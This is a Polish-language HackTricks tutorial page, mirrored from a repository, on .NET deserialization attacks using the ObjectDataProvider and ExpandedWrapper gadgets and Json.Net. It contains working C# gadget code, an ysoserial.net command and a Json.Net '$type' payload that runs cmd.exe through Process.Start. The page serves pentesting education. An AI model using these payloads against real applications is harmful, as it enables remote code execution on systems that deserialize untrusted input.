Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2025-02-17 06:28:27 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.md
Translator workflow 5e0daf0e23 Translated to Polish
2024-02-11 01:46:25 +00:00

10 KiB
Raw Blame History

Podstawowa deserializacja .Net (gadżet ObjectDataProvider, ExpandedWrapper i Json.Net)

Dowiedz się, jak hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!

Ten post jest poświęcony zrozumieniu, jak wykorzystać gadżet ObjectDataProvider do uzyskania RCE i jak można nadużyć bibliotek Serializacji Json.Net i xmlSerializer z tym gadżetem.

Gadżet ObjectDataProvider

Z dokumentacji: klasa ObjectDataProvider opakowuje i tworzy obiekt, który można użyć jako źródło powiązania.
Tak, to dziwne wyjaśnienie, więc zobaczmy, co ta klasa ma tak interesującego: Ta klasa pozwala na opakowanie dowolnego obiektu, używanie MethodParameters do ustawiania dowolnych parametrów, a następnie używanie MethodName do wywołania dowolnej funkcji dowolnego obiektu zadeklarowanego przy użyciu dowolnych parametrów.
W związku z tym, dowolny obiekt będzie wykonywał funkcję z parametrami podczas deserializacji.

Jak to jest możliwe

Przestrzeń nazw System.Windows.Data, znajdująca się w PresentationFramework.dll pod adresem C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF, to miejsce, gdzie zdefiniowany i zaimplementowany jest ObjectDataProvider.

Za pomocą dnSpy można inspirować kod klasy, która nas interesuje. Na poniższym obrazie widzimy kod PresentationFramework.dll --> System.Windows.Data --> ObjectDataProvider --> Nazwa metody

Jak można zauważyć, gdy MethodName jest ustawione, wywoływane jest base.Refresh(), zobaczmy, co ono robi:

Dobrze, kontynuujmy, zobaczmy, co robi this.BeginQuery(). BeginQuery jest przesłonięte przez ObjectDataProvider i to właśnie ono robi:

Zauważ, że na końcu kodu wywoływane jest this.QueryWorke(null). Zobaczmy, co wykonuje ta funkcja:

Zauważ, że to nie jest kompletny kod funkcji QueryWorker, ale pokazuje interesującą jej część: Kod wywołuje this.InvokeMethodOnInstance(out ex);, to jest linia, w której wywoływana jest ustawiona metoda.

Jeśli chcesz sprawdzić, czy po prostu ustawienie MethodName spowoduje jej wykonanie, możesz uruchomić ten kod:

using System.Windows.Data;
using System.Diagnostics;

namespace ODPCustomSerialExample
{
class Program
{
static void Main(string[] args)
{
ObjectDataProvider myODP = new ObjectDataProvider();
myODP.ObjectType = typeof(Process);
myODP.MethodParameters.Add("cmd.exe");
myODP.MethodParameters.Add("/c calc.exe");
myODP.MethodName = "Start";
}
}
}

Należy dodać jako odwołanie C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\PresentationFramework.dll, aby załadować System.Windows.Data.

ExpandedWrapper

Korzystając z poprzedniego ataku, mogą wystąpić przypadki, w których obiekt zostanie zdeserializowany jako instancja ObjectDataProvider (na przykład w przypadku podatności DotNetNuke, używając XmlSerializer, obiekt został zdeserializowany za pomocą GetType). W takim przypadku nie będziemy mieli informacji o typie obiektu, który jest zawarty w instancji ObjectDataProvider (na przykład Process). Więcej informacji na temat podatności DotNetNuke można znaleźć tutaj.

Ta klasa pozwala określić typy obiektów, które są zawarte w danej instancji. Dlatego ta klasa może być używana do opakowania obiektu źródłowego (ObjectDataProvider) w nowy typ obiektu i dostarczenia potrzebnych właściwości (ObjectDataProvider.MethodName i ObjectDataProvider.MethodParameters).
Jest to bardzo przydatne w przypadkach takich jak przedstawiony wcześniej, ponieważ będziemy mogli opakować _ObjectDataProvider** w instancję **ExpandedWrapper _ i po zdeserializowaniu ta klasa utworzy obiekt OjectDataProvider, który wykona funkcję wskazaną w MethodName.

Możesz sprawdzić ten wrapper za pomocą poniższego kodu:

using System.Windows.Data;
using System.Diagnostics;
using System.Data.Services.Internal;

namespace ODPCustomSerialExample
{
class Program
{
static void Main(string[] args)
{
ExpandedWrapper<Process, ObjectDataProvider> myExpWrap = new ExpandedWrapper<Process, ObjectDataProvider>();
myExpWrap.ProjectedProperty0 = new ObjectDataProvider();
myExpWrap.ProjectedProperty0.ObjectInstance = new Process();
myExpWrap.ProjectedProperty0.MethodParameters.Add("cmd.exe");
myExpWrap.ProjectedProperty0.MethodParameters.Add("/c calc.exe");
myExpWrap.ProjectedProperty0.MethodName = "Start";
}
}
}

Json.Net

Na oficjalnej stronie wskazano, że ta biblioteka umożliwia serializację i deserializację dowolnego obiektu .NET za pomocą potężnego serializatora JSON Json.NET. Więc jeśli moglibyśmy deserializować gadżet ObjectDataProvider, moglibyśmy spowodować RCE tylko deserializując obiekt.

Przykład Json.Net

Przede wszystkim zobaczmy przykład, jak serializować/deserializować obiekt za pomocą tej biblioteki:

using System;
using Newtonsoft.Json;
using System.Diagnostics;
using System.Collections.Generic;

namespace DeserializationTests
{
public class Account
{
public string Email { get; set; }
public bool Active { get; set; }
public DateTime CreatedDate { get; set; }
public IList<string> Roles { get; set; }
}
class Program
{
static void Main(string[] args)
{
Account account = new Account
{
Email = "james@example.com",
Active = true,
CreatedDate = new DateTime(2013, 1, 20, 0, 0, 0, DateTimeKind.Utc),
Roles = new List<string>
{
"User",
"Admin"
}
};
//Serialize the object and print it
string json = JsonConvert.SerializeObject(account);
Console.WriteLine(json);
//{"Email":"james@example.com","Active":true,"CreatedDate":"2013-01-20T00:00:00Z","Roles":["User","Admin"]}

//Deserialize it
Account desaccount = JsonConvert.DeserializeObject<Account>(json);
Console.WriteLine(desaccount.Email);
}
}
}

Wykorzystywanie Json.Net

Korzystając z ysoserial.net stworzyłem exploit:

ysoserial.exe -g ObjectDataProvider -f Json.Net -c "calc.exe"
{
'$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35',
'MethodName':'Start',
'MethodParameters':{
'$type':'System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
'$values':['cmd', '/c calc.exe']
},
'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'}
}

W tym kodzie możesz przetestować exploit, po prostu uruchom go i zobaczysz, że zostaje uruchomiona kalkulator:

using System;
using System.Text;
using Newtonsoft.Json;

namespace DeserializationTests
{
class Program
{
static void Main(string[] args)
{
//Declare exploit
string userdata = @"{
'$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35',
'MethodName':'Start',
'MethodParameters':{
'$type':'System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
'$values':['cmd', '/c calc.exe']
},
'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'}
}";
//Exploit to base64
string userdata_b64 = Convert.ToBase64String(System.Text.Encoding.UTF8.GetBytes(userdata));

//Get data from base64
byte[] userdata_nob64 = Convert.FromBase64String(userdata_b64);
//Deserialize data
string userdata_decoded = Encoding.UTF8.GetString(userdata_nob64);
object obj = JsonConvert.DeserializeObject<object>(userdata_decoded, new JsonSerializerSettings
{
TypeNameHandling = TypeNameHandling.Auto
});
}
}
}
Naucz się hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!